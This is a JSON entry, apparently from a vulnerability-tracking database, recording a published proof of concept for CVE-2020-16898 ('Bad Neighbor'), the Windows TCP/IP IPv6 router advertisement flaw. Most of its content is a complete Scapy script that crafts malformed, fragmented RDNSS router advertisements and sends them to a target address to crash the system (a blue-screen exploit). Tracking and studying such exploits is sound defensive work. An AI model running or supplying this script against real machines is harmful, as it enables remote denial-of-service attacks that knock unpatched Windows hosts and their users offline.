{"uuid": "41987148-5dcf-4477-8dbe-a8adf0ab576a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-16898", "type": "published-proof-of-concept", "source": "https://t.me/binary_xor/446", "content": "CVE-2020-16898 \u2013 Exploiting RCE \"Bad Neighbor\" vulnerability\n\nhttps://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html\n\nhttp://blog.pi3.com.pl/?p=780\n\nBSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability\n\nfrom scapy.all import *\n\nv6_dst = \"fd12:db80:b052:0:7ca6:e06e:acc1:481b\"\nv6_src = \"fe80::24f5:a2ff:fe30:8890\"\n\np_test_half = 'A'.encode()*8 + b\"\\x18\\x30\" + b\"\\xFF\\x18\"\np_test = p_test_half + 'A'.encode()*4\n\nc = ICMPv6NDOptEFA();\n\ne = ICMPv6NDOptRDNSS()\ne.len = 21\ne.dns = [\n\"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA\",\n\"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA\",\n\"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA\",\n\"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA\",\n\"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA\",\n\"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA\",\n\"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA\",\n\"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA\",\n\"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA\",\n\"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA\" ]\n\npkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \\\n      Raw(load='A'.encode()*16*2 + p_test_half + b\"\\x18\\xa0\"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e\n\np_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \\\n              IPv6ExtHdrFragment()/pkt\n\nl=fragment6(p_test_frag, 200)\n\nfor p in l:\n    send(p)", "creation_timestamp": "2020-10-27T03:51:47.000000Z"}